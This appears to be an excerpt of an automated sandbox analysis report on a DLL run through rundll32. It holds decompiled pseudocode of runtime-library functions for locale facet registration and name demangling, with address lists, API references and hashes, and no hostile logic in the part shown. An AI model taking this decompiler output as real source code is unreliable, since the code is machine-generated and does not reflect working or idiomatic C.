																																																				 *(_t770 - 4) = 1;
																																																				E6E206FD3(__eflags, _t732);
																																																				 *0x6e26a26c();
																																																				 *((intOrPtr*)( *((intOrPtr*)( *_t732 + 4))))();
																																																				 *0x6e2c6e00 = _t732;
																																																				goto L110;
																																																			}
																																																		} else {
																																																			_t732 = _t750;
																																																			goto L110;
																																																		}
																																																	}
																																																} else {
																																																	_t731 =  *(_t770 - 0x10);
																																																	 *(_t770 - 0x10) = _t731;
																																																	 *(_t770 - 4) = 1;
																																																	E6E206FD3(__eflags, _t731);
																																																	 *0x6e26a26c();
																																																	 *((intOrPtr*)( *((intOrPtr*)( *_t731 + 4))))();
																																																	 *0x6e2c6dcc = _t731;
																																																	goto L103;
																																																}
																																															} else {
																																																_t731 = _t749;
																																																goto L103;
																																															}
																																														}
																																													} else {
																																														_t730 =  *(_t770 - 0x10);
																																														 *(_t770 - 0x10) = _t730;
																																														 *(_t770 - 4) = 1;
																																														E6E206FD3(__eflags, _t730);
																																														 *0x6e26a26c();
																																														 *((intOrPtr*)( *((intOrPtr*)( *_t730 + 4))))();
																																														 *0x6e2c6dfc = _t730;
																																														goto L96;
																																													}
																																												} else {
																																													_t730 = _t748;
																																													goto L96;
																																												}
																																											}
																																										} else {
																																											_t729 =  *(_t770 - 0x10);
																																											 *(_t770 - 0x10) = _t729;
																																											 *(_t770 - 4) = 1;
																																											E6E206FD3(__eflags, _t729);
																																											 *0x6e26a26c();
																																											 *((intOrPtr*)( *((intOrPtr*)( *_t729 + 4))))();
																																											 *0x6e2c6de0 = _t729;
																																											goto L89;
																																										}
																																									} else {
																																										_t729 = _t747;
																																										goto L89;
																																									}
																																								}
																																							} else {
																																								_t728 =  *(_t770 - 0x10);
																																								 *(_t770 - 0x10) = _t728;
																																								 *(_t770 - 4) = 1;
																																								E6E206FD3(__eflags, _t728);
																																								 *0x6e26a26c();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t728 + 4))))();
																																								 *0x6e2c6ddc = _t728;
																																								goto L82;
																																							}
																																						} else {
																																							_t728 = _t746;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t727 =  *(_t770 - 0x10);
																																					 *(_t770 - 0x10) = _t727;
																																					 *(_t770 - 4) = 1;
																																					E6E206FD3(__eflags, _t727);
																																					 *0x6e26a26c();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t727 + 4))))();
																																					 *0x6e2c6db0 = _t727;
																																					goto L75;
																																				}
																																			} else {
																																				_t727 = _t745;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t726 =  *(_t770 - 0x10);
																																		 *(_t770 - 0x10) = _t726;
																																		 *(_t770 - 4) = 1;
																																		E6E206FD3(__eflags, _t726);
																																		 *0x6e26a26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t726 + 4))))();
																																		 *0x6e2c6dd8 = _t726;
																																		goto L68;
																																	}
																																} else {
																																	_t726 = _t744;
																																	goto L68;
																																}
																															}
																														} else {
																															_t725 =  *(_t770 - 0x10);
																															 *(_t770 - 0x10) = _t725;
																															 *(_t770 - 4) = 1;
																															E6E206FD3(__eflags, _t725);
																															 *0x6e26a26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t725 + 4))))();
																															 *0x6e2c6dc4 = _t725;
																															goto L61;
																														}
																													} else {
																														_t725 = _t743;
																														goto L61;
																													}
																												}
																											} else {
																												_t724 =  *(_t770 - 0x10);
																												 *(_t770 - 0x10) = _t724;
																												 *(_t770 - 4) = 1;
																												E6E206FD3(__eflags, _t724);
																												 *0x6e26a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t724 + 4))))();
																												 *0x6e2c6dc8 = _t724;
																												goto L54;
																											}
																										} else {
																											_t724 = _t742;
																											goto L54;
																										}
																									}
																								} else {
																									_t723 =  *(_t770 - 0x10);
																									 *(_t770 - 0x10) = _t723;
																									 *(_t770 - 4) = 1;
																									E6E206FD3(__eflags, _t723);
																									 *0x6e26a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t723 + 4))))();
																									 *0x6e2c6df4 = _t723;
																									goto L47;
																								}
																							} else {
																								_t723 = _t741;
																								goto L47;
																							}
																						}
																					} else {
																						_t722 =  *(_t770 - 0x10);
																						 *(_t770 - 0x10) = _t722;
																						 *(_t770 - 4) = 1;
																						E6E206FD3(__eflags, _t722);
																						 *0x6e26a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t722 + 4))))();
																						 *0x6e2c6df8 = _t722;
																						goto L40;
																					}
																				} else {
																					_t722 = _t740;
																					goto L40;
																				}
																			}
																		} else {
																			_t721 =  *(_t770 - 0x10);
																			 *(_t770 - 0x10) = _t721;
																			 *(_t770 - 4) = 1;
																			E6E206FD3(__eflags, _t721);
																			 *0x6e26a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t721 + 4))))();
																			 *0x6e2c6dc0 = _t721;
																			goto L33;
																		}
																	} else {
																		_t721 = _t739;
																		goto L33;
																	}
																}
															} else {
																_t720 =  *(_t770 - 0x10);
																 *(_t770 - 0x10) = _t720;
																 *(_t770 - 4) = 1;
																E6E206FD3(__eflags, _t720);
																 *0x6e26a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t720 + 4))))();
																 *0x6e2c6df0 = _t720;
																goto L26;
															}
														} else {
															_t720 = _t738;
															goto L26;
														}
													}
												} else {
													_t719 =  *(_t770 - 0x10);
													 *(_t770 - 0x10) = _t719;
													 *(_t770 - 4) = 1;
													E6E206FD3(__eflags, _t719);
													 *0x6e26a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t719 + 4))))();
													 *0x6e2c6dbc = _t719;
													goto L19;
												}
											} else {
												_t719 = _t737;
												goto L19;
											}
										}
									} else {
										_t718 =  *(_t770 - 0x10);
										 *(_t770 - 0x10) = _t718;
										 *(_t770 - 4) = 1;
										E6E206FD3(__eflags, _t718);
										 *0x6e26a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t718 + 4))))();
										 *0x6e2c6dec = _t718;
										goto L12;
									}
								} else {
									_t718 = _t736;
									goto L12;
								}
							}
						} else {
							_t717 =  *(_t770 - 0x10);
							 *(_t770 - 0x10) = _t717;
							 *(_t770 - 4) = 1;
							E6E206FD3(__eflags, _t717);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t717 + 4))))();
							 *0x6e2c6db8 = _t717;
							goto L5;
						}
					} else {
						_t717 = _t735;
						goto L5;
					}
				}
			}

























































                          0x6e20f229
                          0x6e20f229
                          0x6e20f230
                          0x6e20f23a
                          0x6e20f23f
                          0x6e20f24a
                          0x6e20f24e
                          0x6e20f251
                          0x6e20f256
                          0x6e20f25a
                          0x6e20f25f
                          0x6e20f263
                          0x6e20f2a8
                          0x6e20f2ab
                          0x6e20f2b7
                          0x6e20f265
                          0x6e20f267
                          0x6e20f26d
                          0x6e20f273
                          0x6e20f27b
                          0x6e20f27e
                          0x6e20f2bb
                          0x6e20f2c9
                          0x6e20f2ce
                          0x6e20f2d6
                          0x6e20f2e0
                          0x6e20f2e5
                          0x6e20f2f0
                          0x6e20f2f4
                          0x6e20f2f7
                          0x6e20f2fc
                          0x6e20f305
                          0x6e20f307
                          0x6e20f309
                          0x6e20f34e
                          0x6e20f351
                          0x6e20f35d
                          0x6e20f30b
                          0x6e20f30b
                          0x6e20f30d
                          0x6e20f313
                          0x6e20f319
                          0x6e20f321
                          0x6e20f324
                          0x6e20f361
                          0x6e20f36f
                          0x6e20f374
                          0x6e20f37c
                          0x6e20f386
                          0x6e20f38b
                          0x6e20f396
                          0x6e20f39a
                          0x6e20f39d
                          0x6e20f3a2
                          0x6e20f3ab
                          0x6e20f3ad
                          0x6e20f3af
                          0x6e20f3f4
                          0x6e20f3f7
                          0x6e20f403
                          0x6e20f3b1
                          0x6e20f3b1
                          0x6e20f3b3
                          0x6e20f3b9
                          0x6e20f3bf
                          0x6e20f3c7
                          0x6e20f3ca
                          0x6e20f407
                          0x6e20f415
                          0x6e20f41a
                          0x6e20f422
                          0x6e20f42c
                          0x6e20f431
                          0x6e20f43c
                          0x6e20f440
                          0x6e20f443
                          0x6e20f448
                          0x6e20f451
                          0x6e20f453
                          0x6e20f455
                          0x6e20f49a
                          0x6e20f49d
                          0x6e20f4a9
                          0x6e20f457
                          0x6e20f457
                          0x6e20f459
                          0x6e20f45f
                          0x6e20f465
                          0x6e20f46d
                          0x6e20f470
                          0x6e20f4ad
                          0x6e20f4bb
                          0x6e20f4c0
                          0x6e20f4c8
                          0x6e20f4d2
                          0x6e20f4d7
                          0x6e20f4e2
                          0x6e20f4e6
                          0x6e20f4e9
                          0x6e20f4ee
                          0x6e20f4f7
                          0x6e20f4f9
                          0x6e20f4fb
                          0x6e20f540
                          0x6e20f543
                          0x6e20f54f
                          0x6e20f4fd
                          0x6e20f4fd
                          0x6e20f4ff
                          0x6e20f505
                          0x6e20f50b
                          0x6e20f513
                          0x6e20f516
                          0x6e20f553
                          0x6e20f561
                          0x6e20f566
                          0x6e20f56e
                          0x6e20f578
                          0x6e20f57d
                          0x6e20f588
                          0x6e20f58c
                          0x6e20f58f
                          0x6e20f594
                          0x6e20f59d
                          0x6e20f59f
                          0x6e20f5a1
                          0x6e20f5e6
                          0x6e20f5e9
                          0x6e20f5f5
                          0x6e20f5a3
                          0x6e20f5a3
                          0x6e20f5a5
                          0x6e20f5ab
                          0x6e20f5b1
                          0x6e20f5b9
                          0x6e20f5bc
                          0x6e20f5f9
                          0x6e20f607
                          0x6e20f60c
                          0x6e20f614
                          0x6e20f61e
                          0x6e20f623
                          0x6e20f62e
                          0x6e20f632
                          0x6e20f635
                          0x6e20f63a
                          0x6e20f643
                          0x6e20f645
                          0x6e20f647
                          0x6e20f68c
                          0x6e20f68f
                          0x6e20f69b
                          0x6e20f649
                          0x6e20f649
                          0x6e20f64b
                          0x6e20f651
                          0x6e20f657
                          0x6e20f65f
                          0x6e20f662
                          0x6e20f69f
                          0x6e20f6ad
                          0x6e20f6b2
                          0x6e20f6ba
                          0x6e20f6c4
                          0x6e20f6c9
                          0x6e20f6d4
                          0x6e20f6d8
                          0x6e20f6db
                          0x6e20f6e0
                          0x6e20f6e9
                          0x6e20f6eb
                          0x6e20f6ed
                          0x6e20f732
                          0x6e20f735
                          0x6e20f741
                          0x6e20f6ef
                          0x6e20f6ef
                          0x6e20f6f1
                          0x6e20f6f7
                          0x6e20f6fd
                          0x6e20f705
                          0x6e20f708
                          0x6e20f745
                          0x6e20f753
                          0x6e20f758
                          0x6e20f760
                          0x6e20f76a
                          0x6e20f76f
                          0x6e20f77a
                          0x6e20f77e
                          0x6e20f781
                          0x6e20f786
                          0x6e20f78f
                          0x6e20f791
                          0x6e20f793
                          0x6e20f7d8
                          0x6e20f7db
                          0x6e20f7e7
                          0x6e20f795
                          0x6e20f795
                          0x6e20f797
                          0x6e20f79d
                          0x6e20f7a3
                          0x6e20f7ab
                          0x6e20f7ae
                          0x6e20f7eb
                          0x6e20f7f9
                          0x6e20f7fe
                          0x6e20f806
                          0x6e20f810
                          0x6e20f815
                          0x6e20f820
                          0x6e20f824
                          0x6e20f827
                          0x6e20f82c
                          0x6e20f835
                          0x6e20f837
                          0x6e20f839
                          0x6e20f87e
                          0x6e20f881
                          0x6e20f88d
                          0x6e20f83b
                          0x6e20f83b
                          0x6e20f83d
                          0x6e20f843
                          0x6e20f849
                          0x6e20f851
                          0x6e20f854
                          0x6e20f891
                          0x6e20f89f
                          0x6e20f8a4
                          0x6e20f8ac
                          0x6e20f8b6
                          0x6e20f8bb
                          0x6e20f8c6
                          0x6e20f8ca
                          0x6e20f8cd
                          0x6e20f8d2
                          0x6e20f8db
                          0x6e20f8dd
                          0x6e20f8df
                          0x6e20f924
                          0x6e20f927
                          0x6e20f933
                          0x6e20f8e1
                          0x6e20f8e1
                          0x6e20f8e3
                          0x6e20f8e9
                          0x6e20f8ef
                          0x6e20f8f7
                          0x6e20f8fa
                          0x6e20f937
                          0x6e20f945
                          0x6e20f94a
                          0x6e20f952
                          0x6e20f95c
                          0x6e20f961
                          0x6e20f96c
                          0x6e20f970
                          0x6e20f973
                          0x6e20f978
                          0x6e20f981
                          0x6e20f983
                          0x6e20f985
                          0x6e20f9ca
                          0x6e20f9cd
                          0x6e20f9d9
                          0x6e20f987
                          0x6e20f987
                          0x6e20f989
                          0x6e20f98f
                          0x6e20f995
                          0x6e20f99d
                          0x6e20f9a0
                          0x6e20f9dd
                          0x6e20f9eb
                          0x6e20f9f0
                          0x6e20f9f8
                          0x6e20fa02
                          0x6e20fa07
                          0x6e20fa12
                          0x6e20fa16
                          0x6e20fa19
                          0x6e20fa1e
                          0x6e20fa27
                          0x6e20fa29
                          0x6e20fa2b
                          0x6e20fa70
                          0x6e20fa73
                          0x6e20fa7f
                          0x6e20fa2d
                          0x6e20fa2d
                          0x6e20fa2f
                          0x6e20fa35
                          0x6e20fa3b
                          0x6e20fa43
                          0x6e20fa46
                          0x6e20fa83
                          0x6e20fa91
                          0x6e20fa96
                          0x6e20fa9e
                          0x6e20faa8
                          0x6e20faad
                          0x6e20fab8
                          0x6e20fabc
                          0x6e20fabf
                          0x6e20fac4
                          0x6e20facd
                          0x6e20facf
                          0x6e20fad1
                          0x6e20fb16
                          0x6e20fb19
                          0x6e20fb25
                          0x6e20fad3
                          0x6e20fad3
                          0x6e20fad5
                          0x6e20fadb
                          0x6e20fae1
                          0x6e20fae9
                          0x6e20faec
                          0x6e20fb29
                          0x6e20fb37
                          0x6e20fb3c
                          0x6e20fb44
                          0x6e20fb4e
                          0x6e20fb53
                          0x6e20fb5e
                          0x6e20fb62
                          0x6e20fb65
                          0x6e20fb6a
                          0x6e20fb73
                          0x6e20fb75
                          0x6e20fb77
                          0x6e20fbbc
                          0x6e20fbbf
                          0x6e20fbcb
                          0x6e20fb79
                          0x6e20fb79
                          0x6e20fb7b
                          0x6e20fb81
                          0x6e20fb87
                          0x6e20fb8f
                          0x6e20fb92
                          0x6e20fbcf
                          0x6e20fbdd
                          0x6e20fbe2
                          0x6e20fbea
                          0x6e20fbf4
                          0x6e20fbf9
                          0x6e20fc04
                          0x6e20fc08
                          0x6e20fc0b
                          0x6e20fc10
                          0x6e20fc19
                          0x6e20fc1b
                          0x6e20fc1d
                          0x6e20fc62
                          0x6e20fc65
                          0x6e20fc71
                          0x6e20fc1f
                          0x6e20fc1f
                          0x6e20fc21
                          0x6e20fc27
                          0x6e20fc2d
                          0x6e20fc35
                          0x6e20fc38
                          0x6e20fc75
                          0x6e20fc83
                          0x6e20fc88
                          0x6e20fc90
                          0x6e20fc9a
                          0x6e20fc9f
                          0x6e20fcaa
                          0x6e20fcae
                          0x6e20fcb1
                          0x6e20fcb6
                          0x6e20fcbf
                          0x6e20fcc1
                          0x6e20fcc3
                          0x6e20fd08
                          0x6e20fd0b
                          0x6e20fd17
                          0x6e20fcc5
                          0x6e20fcc5
                          0x6e20fcc7
                          0x6e20fccd
                          0x6e20fcd3
                          0x6e20fcdb
                          0x6e20fcde
                          0x6e20fd18
                          0x6e20fd1b
                          0x6e20fd29
                          0x6e20fd2e
                          0x6e20fd36
                          0x6e20fd3b
                          0x6e20fd3d
                          0x6e20fd43
                          0x6e20fd46
                          0x6e20fd4f
                          0x6e20fd4f
                          0x6e20fd4f
                          0x6e20fd53
                          0x6e20fd59
                          0x6e20fd5c
                          0x6e20fd68
                          0x6e20fce0
                          0x6e20fce0
                          0x6e20fce3
                          0x6e20fce7
                          0x6e20fceb
                          0x6e20fcf8
                          0x6e20fd00
                          0x6e20fd02
                          0x00000000
                          0x6e20fd02
                          0x6e20fcc9
                          0x6e20fcc9
                          0x00000000
                          0x6e20fcc9
                          0x6e20fcc7
                          0x6e20fc3a
                          0x6e20fc3a
                          0x6e20fc3d
                          0x6e20fc41
                          0x6e20fc45
                          0x6e20fc52
                          0x6e20fc5a
                          0x6e20fc5c
                          0x00000000
                          0x6e20fc5c
                          0x6e20fc23
                          0x6e20fc23
                          0x00000000
                          0x6e20fc23
                          0x6e20fc21
                          0x6e20fb94
                          0x6e20fb94
                          0x6e20fb97
                          0x6e20fb9b
                          0x6e20fb9f
                          0x6e20fbac
                          0x6e20fbb4
                          0x6e20fbb6
                          0x00000000
                          0x6e20fbb6
                          0x6e20fb7d
                          0x6e20fb7d
                          0x00000000
                          0x6e20fb7d
                          0x6e20fb7b
                          0x6e20faee
                          0x6e20faee
                          0x6e20faf1
                          0x6e20faf5
                          0x6e20faf9
                          0x6e20fb06
                          0x6e20fb0e
                          0x6e20fb10
                          0x00000000
                          0x6e20fb10
                          0x6e20fad7
                          0x6e20fad7
                          0x00000000
                          0x6e20fad7
                          0x6e20fad5
                          0x6e20fa48
                          0x6e20fa48
                          0x6e20fa4b
                          0x6e20fa4f
                          0x6e20fa53
                          0x6e20fa60
                          0x6e20fa68
                          0x6e20fa6a
                          0x00000000
                          0x6e20fa6a
                          0x6e20fa31
                          0x6e20fa31
                          0x00000000
                          0x6e20fa31
                          0x6e20fa2f
                          0x6e20f9a2
                          0x6e20f9a2
                          0x6e20f9a5
                          0x6e20f9a9
                          0x6e20f9ad
                          0x6e20f9ba
                          0x6e20f9c2
                          0x6e20f9c4
                          0x00000000
                          0x6e20f9c4
                          0x6e20f98b
                          0x6e20f98b
                          0x00000000
                          0x6e20f98b
                          0x6e20f989
                          0x6e20f8fc
                          0x6e20f8fc
                          0x6e20f8ff
                          0x6e20f903
                          0x6e20f907
                          0x6e20f914
                          0x6e20f91c
                          0x6e20f91e
                          0x00000000
                          0x6e20f91e
                          0x6e20f8e5
                          0x6e20f8e5
                          0x00000000
                          0x6e20f8e5
                          0x6e20f8e3
                          0x6e20f856
                          0x6e20f856
                          0x6e20f859
                          0x6e20f85d
                          0x6e20f861
                          0x6e20f86e
                          0x6e20f876
                          0x6e20f878
                          0x00000000
                          0x6e20f878
                          0x6e20f83f
                          0x6e20f83f
                          0x00000000
                          0x6e20f83f
                          0x6e20f83d
                          0x6e20f7b0
                          0x6e20f7b0
                          0x6e20f7b3
                          0x6e20f7b7
                          0x6e20f7bb
                          0x6e20f7c8
                          0x6e20f7d0
                          0x6e20f7d2
                          0x00000000
                          0x6e20f7d2
                          0x6e20f799
                          0x6e20f799
                          0x00000000
                          0x6e20f799
                          0x6e20f797
                          0x6e20f70a
                          0x6e20f70a
                          0x6e20f70d
                          0x6e20f711
                          0x6e20f715
                          0x6e20f722
                          0x6e20f72a
                          0x6e20f72c
                          0x00000000
                          0x6e20f72c
                          0x6e20f6f3
                          0x6e20f6f3
                          0x00000000
                          0x6e20f6f3
                          0x6e20f6f1
                          0x6e20f664
                          0x6e20f664
                          0x6e20f667
                          0x6e20f66b
                          0x6e20f66f
                          0x6e20f67c
                          0x6e20f684
                          0x6e20f686
                          0x00000000
                          0x6e20f686
                          0x6e20f64d
                          0x6e20f64d
                          0x00000000
                          0x6e20f64d
                          0x6e20f64b
                          0x6e20f5be
                          0x6e20f5be
                          0x6e20f5c1
                          0x6e20f5c5
                          0x6e20f5c9
                          0x6e20f5d6
                          0x6e20f5de
                          0x6e20f5e0
                          0x00000000
                          0x6e20f5e0
                          0x6e20f5a7
                          0x6e20f5a7
                          0x00000000
                          0x6e20f5a7
                          0x6e20f5a5
                          0x6e20f518
                          0x6e20f518
                          0x6e20f51b
                          0x6e20f51f
                          0x6e20f523
                          0x6e20f530
                          0x6e20f538
                          0x6e20f53a
                          0x00000000
                          0x6e20f53a
                          0x6e20f501
                          0x6e20f501
                          0x00000000
                          0x6e20f501
                          0x6e20f4ff
                          0x6e20f472
                          0x6e20f472
                          0x6e20f475
                          0x6e20f479
                          0x6e20f47d
                          0x6e20f48a
                          0x6e20f492
                          0x6e20f494
                          0x00000000
                          0x6e20f494
                          0x6e20f45b
                          0x6e20f45b
                          0x00000000
                          0x6e20f45b
                          0x6e20f459
                          0x6e20f3cc
                          0x6e20f3cc
                          0x6e20f3cf
                          0x6e20f3d3
                          0x6e20f3d7
                          0x6e20f3e4
                          0x6e20f3ec
                          0x6e20f3ee
                          0x00000000
                          0x6e20f3ee
                          0x6e20f3b5
                          0x6e20f3b5
                          0x00000000
                          0x6e20f3b5
                          0x6e20f3b3
                          0x6e20f326
                          0x6e20f326
                          0x6e20f329
                          0x6e20f32d
                          0x6e20f331
                          0x6e20f33e
                          0x6e20f346
                          0x6e20f348
                          0x00000000
                          0x6e20f348
                          0x6e20f30f
                          0x6e20f30f
                          0x00000000
                          0x6e20f30f
                          0x6e20f30d
                          0x6e20f280
                          0x6e20f280
                          0x6e20f283
                          0x6e20f287
                          0x6e20f28b
                          0x6e20f298
                          0x6e20f2a0
                          0x6e20f2a2
                          0x00000000
                          0x6e20f2a2
                          0x6e20f269
                          0x6e20f269
                          0x00000000
                          0x6e20f269
                          0x6e20f267

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E20F230
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E20F23A
                          • int.LIBCPMT ref: 6E20F251
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • messages.LIBCPMT ref: 6E20F274
                          • std::_Facet_Register.LIBCPMT ref: 6E20F28B
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E20F2AB
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E20F2C9
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.491922041.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000002.00000002.490968383.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.507696729.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511770021.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511847057.000000006E2C8000.00000040.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511938993.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511969094.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmessages
                          • String ID: lm,n
                          • API String ID: 438560357-2206263333
                          • Opcode ID: 9b5121115db1075f85e04779bc2fd0571f1b2e1df53b73329ef1a14ecf9c44ce
                          • Instruction ID: 1c104a9268f021b353bb8231c8ab20f96f0e8e10f81fcfdd2560fc16708d8229
                          • Opcode Fuzzy Hash: 9b5121115db1075f85e04779bc2fd0571f1b2e1df53b73329ef1a14ecf9c44ce
                          • Instruction Fuzzy Hash: 5F11067990051E8FCF00DBE0C894AEEB77BAF84B15F240908E4206B3D0DF749A84C791
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E22735D, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E6E22735D(void* __eflags, signed int* _a4) {
				intOrPtr _v8;
				char _v12;
				char _v20;
				intOrPtr _t17;
				intOrPtr* _t20;
				void* _t22;
				void* _t25;
				signed int* _t30;
				intOrPtr* _t33;
				void* _t42;

				E6E225A6C( &_v12, E6E22614D(0));
				_t33 =  *0x6e2c7218; // 0x0
				_t17 =  *_t33;
				if(_t17 == 0) {
					E6E226052( &_v12, 1);
					goto L8;
				} else {
					 *0x6e2c7218 = _t33 + 1;
					_t22 = _t17 - 0x30;
					if(_t22 == 0) {
						E6E225FF1( &_v12, "void");
						goto L8;
					} else {
						_t25 = _t22;
						if(_t25 == 0) {
							E6E225EFB( &_v12, E6E229DB3(_t42, __eflags,  &_v20));
							goto L8;
						} else {
							if(_t25 != 3) {
								L8:
								E6E225FF1( &_v12, ") ");
								_t20 = _a4;
								 *_t20 = _v12;
								 *((intOrPtr*)(_t20 + 4)) = _v8;
								return _t20;
							} else {
								_t30 = _a4;
								_t30[1] = _t30[1] & 0x00000000;
								 *_t30 =  *_t30 & 0x00000000;
								_t30[1] = 2;
								return _t30;
							}
						}
					}
				}
			}













                          0x6e22736f
                          0x6e227374
                          0x6e22737a
                          0x6e22737e
                          0x6e2273d3
                          0x00000000
                          0x6e227380
                          0x6e227384
                          0x6e22738a
                          0x6e22738d
                          0x6e2273c7
                          0x00000000
                          0x6e22738f
                          0x6e227390
                          0x6e227393
                          0x6e2273b8
                          0x00000000
                          0x6e227395
                          0x6e227398
                          0x6e2273d8
                          0x6e2273e0
                          0x6e2273e5
                          0x6e2273eb
                          0x6e2273f0
                          0x6e2273f4
                          0x6e22739a
                          0x6e22739a
                          0x6e22739d
                          0x6e2273a1
                          0x6e2273a4
                          0x6e2273a9
                          0x6e2273a9
                          0x6e227398
                          0x6e227393
                          0x6e22738d

                          APIs
                          • UnDecorator::UScore.LIBVCRUNTIME ref: 6E227365
                          • DName::DName.LIBVCRUNTIME ref: 6E22736F
                            • Part of subcall function 6E225A6C: DName::doPchar.LIBVCRUNTIME ref: 6E225A93
                          • UnDecorator::getScopedName.LIBVCRUNTIME ref: 6E2273AE
                          • DName::operator+=.LIBVCRUNTIME ref: 6E2273B8
                          • DName::operator+=.LIBCMT ref: 6E2273C7
                          • DName::operator+=.LIBCMT ref: 6E2273D3
                          • DName::operator+=.LIBCMT ref: 6E2273E0
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.491922041.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000002.00000002.490968383.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.507696729.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511770021.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511847057.000000006E2C8000.00000040.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511938993.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511969094.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Name::operator+=$Name$Decorator::Decorator::getName::Name::doPcharScopedScore
                          • String ID: void
                          • API String ID: 1480779885-3531332078
                          • Opcode ID: c8a73d171bb76357443661164a13ea16987a8bbd2f5d7f14bb2b591226f0a5b3
                          • Instruction ID: 16cc9319238a68ac39c54c6150795e32d24dcece4c89620ef7e106bd7ad328bf
                          • Opcode Fuzzy Hash: c8a73d171bb76357443661164a13ea16987a8bbd2f5d7f14bb2b591226f0a5b3
                          • Instruction Fuzzy Hash: EE11A13585420D9FDB04DFE4C8A5FECBBBABB01709F0084A8F8019B2D5DBB0AA45CB51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E20F037, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 72%
                          			E6E20F037(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t293;
				signed int _t294;
				void* _t306;
				void* _t319;
				void* _t332;
				void* _t345;
				void* _t358;
				void* _t371;
				void* _t384;
				void* _t397;
				void* _t410;
				void* _t423;
				void* _t436;
				void* _t449;
				void* _t462;
				void* _t475;
				void* _t488;
				void* _t501;
				void* _t514;
				void* _t527;
				void* _t540;
				signed int _t777;
				signed int _t841;
				signed int _t842;
				signed int _t843;
				signed int _t844;
				signed int _t845;
				signed int _t846;
				signed int _t847;
				signed int _t848;
				signed int _t849;
				signed int _t850;
				signed int _t851;
				signed int _t852;
				signed int _t853;
				signed int _t854;
				signed int _t855;
				signed int _t856;
				signed int _t857;
				signed int _t858;
				signed int _t859;
				signed int _t861;
				signed int _t862;
				signed int _t863;
				signed int _t864;
				signed int _t865;
				signed int _t866;
				signed int _t867;
				signed int _t868;
				signed int _t869;
				signed int _t870;
				signed int _t871;
				signed int _t872;
				signed int _t873;
				signed int _t874;
				signed int _t875;
				signed int _t876;
				signed int _t877;
				signed int _t878;
				signed int _t879;
				signed int _t880;
				signed int _t881;
				void* _t902;

				_t838 = __edx;
				_t637 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t902 - 0x14, 0);
				_t861 =  *0x6e2c6db4; // 0x0
				 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
				 *(_t902 - 0x10) = _t861;
				_t293 = E6E1E161C(0x6e2c6d68);
				_t640 =  *((intOrPtr*)(_t902 + 8));
				_t294 = E6E1E171B( *((intOrPtr*)(_t902 + 8)), _t293);
				_t840 = _t294;
				if(_t294 != 0) {
					L5:
					E6E2066BA(_t902 - 0x14);
					return E6E220075(_t840);
				} else {
					if(_t861 == 0) {
						_push( *((intOrPtr*)(_t902 + 8)));
						_push(_t902 - 0x10);
						__eflags = E6E210DA5(__ebx, _t640, __edx, _t840, _t861) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t902 - 0x20);
							E6E223D74(_t902 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t840, _t861, 0x14);
							E6E206653(_t902 - 0x14, 0);
							_t862 =  *0x6e2c6dd4; // 0x0
							 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
							 *(_t902 - 0x10) = _t862;
							_t306 = E6E1E161C(0x6e2c6b28);
							_t647 =  *((intOrPtr*)(_t902 + 8));
							_t841 = E6E1E171B( *((intOrPtr*)(_t902 + 8)), _t306);
							__eflags = _t841;
